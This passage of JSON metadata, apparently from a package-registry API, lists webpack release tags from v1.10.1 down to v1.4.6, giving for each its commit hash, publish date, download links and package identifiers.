","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G